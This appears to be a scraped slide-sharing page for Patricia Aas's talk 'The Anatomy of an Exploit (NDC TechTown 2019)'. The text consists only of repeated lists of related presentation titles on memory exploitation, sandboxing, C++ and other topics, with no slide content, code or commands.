The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)Patricia Aas
 
Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Huntingsanghwan ahn
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 

Recommended

The Anatomy of an Exploit
The Anatomy of an ExploitThe Anatomy of an Exploit
The Anatomy of an ExploitPatricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)Patricia Aas
 
Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Software Vulnerabilities in C and C++ (CppCon 2018)
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Huntingsanghwan ahn
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Dosanghwan ahn
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguagePatricia Aas
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Giovanni Bechis
 
Deterministic simulation testing
Deterministic simulation testingDeterministic simulation testing
Deterministic simulation testingFoundationDB
 
Pledge in OpenBSD
Pledge in OpenBSDPledge in OpenBSD
Pledge in OpenBSDGiovanni Bechis
 
The Magnificent Seven
The Magnificent SevenThe Magnificent Seven
The Magnificent SevenMike Fogus
 
Verifikation - Metoder og Libraries
Verifikation - Metoder og LibrariesVerifikation - Metoder og Libraries
Verifikation - Metoder og LibrariesInfinIT - Innovationsnetværket for it
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
System Calls
System CallsSystem Calls
System CallsDavid Evans
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
W8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorW8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorDaniel Roggen
 
Stack Smashing Protector (Paul Rascagneres)
Stack Smashing Protector (Paul Rascagneres)Stack Smashing Protector (Paul Rascagneres)
Stack Smashing Protector (Paul Rascagneres)Hackfest Communication
 
Csw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCsw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCanSecWest
 
iCloud keychain
iCloud keychainiCloud keychain
iCloud keychainAlexey Troshichev
 
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Mr. Vengineer
 
Csw2016 gong pwn_a_nexus_device_with_a_single_vulnerability
Csw2016 gong pwn_a_nexus_device_with_a_single_vulnerabilityCsw2016 gong pwn_a_nexus_device_with_a_single_vulnerability
Csw2016 gong pwn_a_nexus_device_with_a_single_vulnerabilityCanSecWest
 
Down to Stack Traces, up from Heap Dumps
Down to Stack Traces, up from Heap DumpsDown to Stack Traces, up from Heap Dumps
Down to Stack Traces, up from Heap DumpsAndrei Pangin
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsAjin Abraham
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Patricia Aas
 
Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Patricia Aas
 

More Related Content

What's hot

A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Dosanghwan ahn
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguagePatricia Aas
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Giovanni Bechis
 
Deterministic simulation testing
Deterministic simulation testingDeterministic simulation testing
Deterministic simulation testingFoundationDB
 
The Magnificent Seven
The Magnificent SevenThe Magnificent Seven
The Magnificent SevenMike Fogus
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
W8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorW8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorDaniel Roggen
 
Stack Smashing Protector (Paul Rascagneres)
Stack Smashing Protector (Paul Rascagneres)Stack Smashing Protector (Paul Rascagneres)
Stack Smashing Protector (Paul Rascagneres)Hackfest Communication
 
Csw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCsw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCanSecWest
 
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Mr. Vengineer
 
Csw2016 gong pwn_a_nexus_device_with_a_single_vulnerability
Csw2016 gong pwn_a_nexus_device_with_a_single_vulnerabilityCsw2016 gong pwn_a_nexus_device_with_a_single_vulnerability
Csw2016 gong pwn_a_nexus_device_with_a_single_vulnerabilityCanSecWest
 
Down to Stack Traces, up from Heap Dumps
Down to Stack Traces, up from Heap DumpsDown to Stack Traces, up from Heap Dumps
Down to Stack Traces, up from Heap DumpsAndrei Pangin
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsAjin Abraham
 

What's hot (20)

A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)
 
Deterministic simulation testing
Deterministic simulation testingDeterministic simulation testing
Deterministic simulation testing
 
Pledge in OpenBSD
Pledge in OpenBSDPledge in OpenBSD
Pledge in OpenBSD
 
The Magnificent Seven
The Magnificent SevenThe Magnificent Seven
The Magnificent Seven
 
Verifikation - Metoder og Libraries
Verifikation - Metoder og LibrariesVerifikation - Metoder og Libraries
Verifikation - Metoder og Libraries
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
System Calls
System CallsSystem Calls
System Calls
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
W8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorW8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational Processor
 
Stack Smashing Protector (Paul Rascagneres)
Stack Smashing Protector (Paul Rascagneres)Stack Smashing Protector (Paul Rascagneres)
Stack Smashing Protector (Paul Rascagneres)
 
Csw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCsw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemes
 
iCloud keychain
iCloud keychainiCloud keychain
iCloud keychain
 
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
 
Csw2016 gong pwn_a_nexus_device_with_a_single_vulnerability
Csw2016 gong pwn_a_nexus_device_with_a_single_vulnerabilityCsw2016 gong pwn_a_nexus_device_with_a_single_vulnerability
Csw2016 gong pwn_a_nexus_device_with_a_single_vulnerability
 
Down to Stack Traces, up from Heap Dumps
Down to Stack Traces, up from Heap DumpsDown to Stack Traces, up from Heap Dumps
Down to Stack Traces, up from Heap Dumps
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 

Similar to The Anatomy of an Exploit (NDC TechTown 2019))

Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Patricia Aas
 
Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Patricia Aas
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfPatricia Aas
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Patricia Aas
 
Do we need Unsafe in Java?
Do we need Unsafe in Java?Do we need Unsafe in Java?
Do we need Unsafe in Java?Andrei Pangin
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxPatricia Aas
 
evil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdfevil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdffortmdu
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introductionPatricia Aas
 
start_printf: dev/ic/com.c comstart()
start_printf: dev/ic/com.c comstart()start_printf: dev/ic/com.c comstart()
start_printf: dev/ic/com.c comstart()Kiwamu Okabe
 
Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Aleksandr Yampolskiy
 
TASK #1In the domain class you will create a loop that will prompt.pdf
TASK #1In the domain class you will create a loop that will prompt.pdfTASK #1In the domain class you will create a loop that will prompt.pdf
TASK #1In the domain class you will create a loop that will prompt.pdfindiaartz
 
Ghost Vulnerability CVE-2015-0235
Ghost Vulnerability CVE-2015-0235Ghost Vulnerability CVE-2015-0235
Ghost Vulnerability CVE-2015-0235Rajivarnan (Rajiv)
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Patricia Aas
 
2015-GopherCon-Talk-Uptime.pdf
2015-GopherCon-Talk-Uptime.pdf2015-GopherCon-Talk-Uptime.pdf
2015-GopherCon-Talk-Uptime.pdfUtabeUtabe
 
Zarzadzanie pamiecia w .NET - WDI
Zarzadzanie pamiecia w .NET - WDIZarzadzanie pamiecia w .NET - WDI
Zarzadzanie pamiecia w .NET - WDIKonrad Kokosa
 
망고100 보드로 놀아보자 15
망고100 보드로 놀아보자 15망고100 보드로 놀아보자 15
망고100 보드로 놀아보자 15종인 전
 

Similar to The Anatomy of an Exploit (NDC TechTown 2019)) (20)

Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)
 
Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdf
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)
 
Do we need Unsafe in Java?
Do we need Unsafe in Java?Do we need Unsafe in Java?
Do we need Unsafe in Java?
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium Sandbox
 
Crash Fast & Furious
Crash Fast & FuriousCrash Fast & Furious
Crash Fast & Furious
 
Vagrant for real
Vagrant for realVagrant for real
Vagrant for real
 
evil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdfevil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdf
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introduction
 
start_printf: dev/ic/com.c comstart()
start_printf: dev/ic/com.c comstart()start_printf: dev/ic/com.c comstart()
start_printf: dev/ic/com.c comstart()
 
Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?
 
TASK #1In the domain class you will create a loop that will prompt.pdf
TASK #1In the domain class you will create a loop that will prompt.pdfTASK #1In the domain class you will create a loop that will prompt.pdf
TASK #1In the domain class you will create a loop that will prompt.pdf
 
Ghost
GhostGhost
Ghost
 
Ghost Vulnerability CVE-2015-0235
Ghost Vulnerability CVE-2015-0235Ghost Vulnerability CVE-2015-0235
Ghost Vulnerability CVE-2015-0235
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)
 
2015-GopherCon-Talk-Uptime.pdf
2015-GopherCon-Talk-Uptime.pdf2015-GopherCon-Talk-Uptime.pdf
2015-GopherCon-Talk-Uptime.pdf
 
Zarzadzanie pamiecia w .NET - WDI
Zarzadzanie pamiecia w .NET - WDIZarzadzanie pamiecia w .NET - WDI
Zarzadzanie pamiecia w .NET - WDI
 
망고100 보드로 놀아보자 15
망고100 보드로 놀아보자 15망고100 보드로 놀아보자 15
망고100 보드로 놀아보자 15
 
Jasmine BDD for Javascript
Jasmine BDD for JavascriptJasmine BDD for Javascript
Jasmine BDD for Javascript
 

More from Patricia Aas

NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfPatricia Aas
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)Patricia Aas
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Patricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Patricia Aas
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)Patricia Aas
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Patricia Aas
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Patricia Aas
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Patricia Aas
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Patricia Aas
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Patricia Aas
 
Make it Fixable (NDC Copenhagen 2018)
Make it Fixable (NDC Copenhagen 2018)Make it Fixable (NDC Copenhagen 2018)
Make it Fixable (NDC Copenhagen 2018)Patricia Aas
 
Trying to learn C# (NDC Oslo 2019)
Trying to learn C# (NDC Oslo 2019)Trying to learn C# (NDC Oslo 2019)
Trying to learn C# (NDC Oslo 2019)Patricia Aas
 
Why Is Election Security So Hard? (Paranoia 2019)
Why Is Election Security So Hard? (Paranoia 2019) Why Is Election Security So Hard? (Paranoia 2019)
Why Is Election Security So Hard? (Paranoia 2019) Patricia Aas
 
Reading Other Peoples Code (NDC Copenhagen 2019)
Reading Other Peoples Code (NDC Copenhagen 2019)Reading Other Peoples Code (NDC Copenhagen 2019)
Reading Other Peoples Code (NDC Copenhagen 2019)Patricia Aas
 
6 DevSecOps Hacks (femtech 2019)
6 DevSecOps Hacks (femtech 2019)6 DevSecOps Hacks (femtech 2019)
6 DevSecOps Hacks (femtech 2019)Patricia Aas
 
C++ The Principles of Most Surprise
C++ The Principles of Most SurpriseC++ The Principles of Most Surprise
C++ The Principles of Most SurprisePatricia Aas
 
C++ is like JavaScript
C++ is like JavaScriptC++ is like JavaScript
C++ is like JavaScriptPatricia Aas
 
Reading Other Peoples Code (NDC London 2019)
Reading Other Peoples Code (NDC London 2019)Reading Other Peoples Code (NDC London 2019)
Reading Other Peoples Code (NDC London 2019)Patricia Aas
 

More from Patricia Aas (20)

NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
 
Telling a story
Telling a storyTelling a story
Telling a story
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019)
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)
 
Make it Fixable (NDC Copenhagen 2018)
Make it Fixable (NDC Copenhagen 2018)Make it Fixable (NDC Copenhagen 2018)
Make it Fixable (NDC Copenhagen 2018)
 
Trying to learn C# (NDC Oslo 2019)
Trying to learn C# (NDC Oslo 2019)Trying to learn C# (NDC Oslo 2019)
Trying to learn C# (NDC Oslo 2019)
 
Why Is Election Security So Hard? (Paranoia 2019)
Why Is Election Security So Hard? (Paranoia 2019) Why Is Election Security So Hard? (Paranoia 2019)
Why Is Election Security So Hard? (Paranoia 2019)
 
Reading Other Peoples Code (NDC Copenhagen 2019)
Reading Other Peoples Code (NDC Copenhagen 2019)Reading Other Peoples Code (NDC Copenhagen 2019)
Reading Other Peoples Code (NDC Copenhagen 2019)
 
6 DevSecOps Hacks (femtech 2019)
6 DevSecOps Hacks (femtech 2019)6 DevSecOps Hacks (femtech 2019)
6 DevSecOps Hacks (femtech 2019)
 
C++ The Principles of Most Surprise
C++ The Principles of Most SurpriseC++ The Principles of Most Surprise
C++ The Principles of Most Surprise
 
C++ is like JavaScript
C++ is like JavaScriptC++ is like JavaScript
C++ is like JavaScript
 
Reading Other Peoples Code (NDC London 2019)
Reading Other Peoples Code (NDC London 2019)Reading Other Peoples Code (NDC London 2019)
Reading Other Peoples Code (NDC London 2019)
 

Recently uploaded

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
